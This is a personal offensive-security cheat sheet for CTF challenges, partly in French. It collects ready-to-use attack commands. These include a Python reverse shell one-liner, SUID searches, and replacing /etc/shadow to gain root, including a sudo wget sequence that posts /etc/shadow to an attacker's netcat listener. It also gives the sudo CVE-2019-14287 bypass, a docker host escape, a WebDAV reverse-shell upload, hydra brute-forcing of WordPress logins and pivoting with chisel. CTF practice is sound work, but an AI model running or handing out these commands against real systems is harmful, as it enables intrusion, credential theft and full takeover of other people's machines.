Author: Winiga Youssouf
Nickname: Spyd3r
Email: youssoufwiniga@gmail.com


##################################### OFFENSIVE & DEFENSIVE SECURITY :: CTF CHALLENGES :: NOTES ########################################

                                            
                                            <-- STEGANOGRAPHY -->

                                                >>> AUDIO <<<

- Audio Stegano
- Audacity
- Sonic Visualizer


                                                >>> IMAGE <<<

- Jsteg (jpeg)
- Zsteg (png, bmp)
- Stegseek
- Steghide
- Stegcracker




############################## WINDOWS POWERSHELL COMMANDS ###############################


system informations:


 Get-ComputerInfo -Property "Os*"
 Get-LocalUser

 #first ip connected
 HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run

 #accounts had administrative privileges
 Get-LocalGroupMember -Group “Administrators”

 #scheduled task
 Get-ScheduledTask | where {$_.TaskPath -eq “\”}

 #Task executed
 $task = Get-ScheduledTask | Where TaskName -EQ “Clean file system”



 ######################################## GPG DECRYPT ###################################

#Ajouter la clé à GPG
gpg --import private.asc

#Voir la liste des clé
gpg --list-secret-keys

#Décrypter le fichier
gpg --decrypt backup.pgp


###################################### REVERSE SHELLS ###################################


Python Reverse Shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'




##################################### PRIVESC ##########################################

#chercher les bibaire avec le bit SUID
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -type  f 2>/dev/null
find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

#chercher les binaire qui peuvent être exécuter avec le groupe <groupe_name>
find / -group admin -perm /g=x 2>/dev/null


###USE /etc/shadow to be root

-download /etc/shadow on local machine
-create a new password for root:
    openssl passwd -6 -salt 'salt' 'password'
-replace the root password in shadow file
    
example : root:$6$salt$IxDD3jeSOb5eB1CX5LBsqZFVkJdido3OUILO5Ifz5iwMuTS4XMS130MTSuDDl3aCI6WouIL9AjRbLCelDCy.g.:18195:0:99999:7:::

-upload the shadow file in victime machine and replace the /etc/shadow file
-then connect as root with the created password
    su root


*************************************** wget privesc *******************************

#remote
sudo -l

(root) NOPASSWD: /usr/bin/wget


#local
nc -lvnp 4444

#remote
sudo /usr/bin/wget --post-file=/etc/shadow <local-ip> 4444

#local
vim shadow.txt

# -6: SHA512
openssl passwd -6 -salt 'salt' 'password'


#local
root:$6$salt$IxDD...DCy.g.:18195:0:99999:7:::

#local
python3 -m http.server 8000

#remote
sudo /usr/bin/wget http://<local-ip>:8000/shadow.txt -O /etc/shadow 

#remote
su root




##################################### REGEX TRICKS ######################################


sed -n 's/.*://p' fowsniff.txt > hashes.txt
awk -F'@' '{print $1}' fowsniff.txt > users.txt
sed -n 's/.*://p' cracked.txt > pass.txt


##################################### EXPLOIT ########################################

#sudo version 1.8.27 (CVE-2019-14287) ::: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash

#docker exploit
docker run -v /:/mnt --rm -it alpine chroot /mnt sh


##################################### UPLOAD FILE #########################################

#Avec netcat
nc 10.10.132.122 7777 > user.jpg
nc -q 5 -lvnp 7777 < user.jpg


##################################### FIREFOX TRICKS #######################################

#allow ports
network.security.ports.banned.override


##################################### CURL TRICKS #########################################

#faire une requête en spécifiant le user-agent
curl -A "<user-agent>" -L <ip_address>

#file upload on a webdav
curl --user "wampp:xampp" http://<ip_address>/webdav/ --upload-file <reverse_shell>.php -v




#################################### SHELL STABILISATION ###################################

#using python pty
python3 -c "import pty;pty.spawn('/bin/bash')"


#dans mon shell
stty raw -echo;fg

#dans le shell de la victime
stty rows 29 columns 126
export TERM=screen

#################################### ENUMERATION TOOLS #################################

-chisel
-linpeas
-pspy
-netsat -ano

#################################### PIVOTING AND PORT FORWARDING ######################

#port forwarding using SSH

-target side:
    #create SSH key pair
    ssh-keysign -f <username>
    #copied the public key to the authorized_keys
    cd ~/.ssh
    echo "<public_key" > authorized_keys
    chmod 600 <private key>


-attacker side
ssh -L <reverse_port>:127.0.0.1:<port> -i <private_key> <username>@<target_ip_address>

#port forwarding using chisel

-target side:
./chisel client <attaquer_ip>:<exposed_port> R:<reverse_port>:127.0.0.1:<listen_port>

-attacker side
./chisel server --reverse --port <exposed_port>



################################# WORDPRESS TRICKS ####################################

#TEST VALIDE USER (permet de en fonction de la réponse du serveur si le username est correct)
hydra -L ./fsocity.dic -p test 10.10.201.188 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username" -t 30


################################# COMMANDES UTILES DE LINUX ##########################

#Créer un nouvelle utilisateur
sudo useradd -m <nom_d'utilisateur>

#lui attribuer un password
sudo echo "<nom-d'utilisateur>:<password> | sudo chpasswd

#lui attribuer un shell
sudo chsh -s /bin/bash <nom_d'utilisateur>

#définir comme hostanme
sudo hostnamectl set-hostname <nom_d'utilisateur>

#écrire un fichier sur plusieurs lignes
cat << EOF > <nom_du_fichier>
contenu
contenu
contenu
EOF



